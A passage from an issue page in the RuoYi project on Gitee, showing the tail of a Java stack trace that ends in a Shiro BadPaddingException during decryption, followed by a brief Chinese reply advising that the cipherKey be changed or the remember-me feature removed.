at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:92)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.HiddenHttpMethodFilter.doFilterInternal(HiddenHttpMethodFilter.java:93)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:200)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:490)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:139)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:408)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:791)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1417)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:748)
Caused by: javax.crypto.BadPaddingException: Given final block not properly padded. Such issues can arise if a bad key is used during decryption.
at com.sun.crypto.provider.CipherCore.unpad(CipherCore.java:975)
at com.sun.crypto.provider.CipherCore.fillOutputBuffer(CipherCore.java:1056)
at com.sun.crypto.provider.CipherCore.doFinal(CipherCore.java:853)
at com.sun.crypto.provider.AESCipher.engineDoFinal(AESCipher.java:446)
at javax.crypto.Cipher.doFinal(Cipher.java:2168)
at org.apache.shiro.crypto.JcaCipherService.crypt(JcaCipherService.java:459)
... 51 common frames omitted

更换cipherKey秘钥,或去掉记住我这个功能。

Sign in to comment

Status
Assignees
Milestones
Pull Requests
Successfully merging a pull request will close this issue.
Branches
Planed to start   -   Planed to end
-
Top level
Priority
参与者(13)
389553 richmoster 1598435988 1151004 y project 1578942802 7550349 laidongmin 1623383398 988087 wulasite 1578937657
加载更多
Java
1
https://gitee.com/y_project/RuoYi.git
git@gitee.com:y_project/RuoYi.git
y_project
RuoYi
RuoYi

Search

184635 d8eb8a04 1850385 161156 f1cf3f24 1850385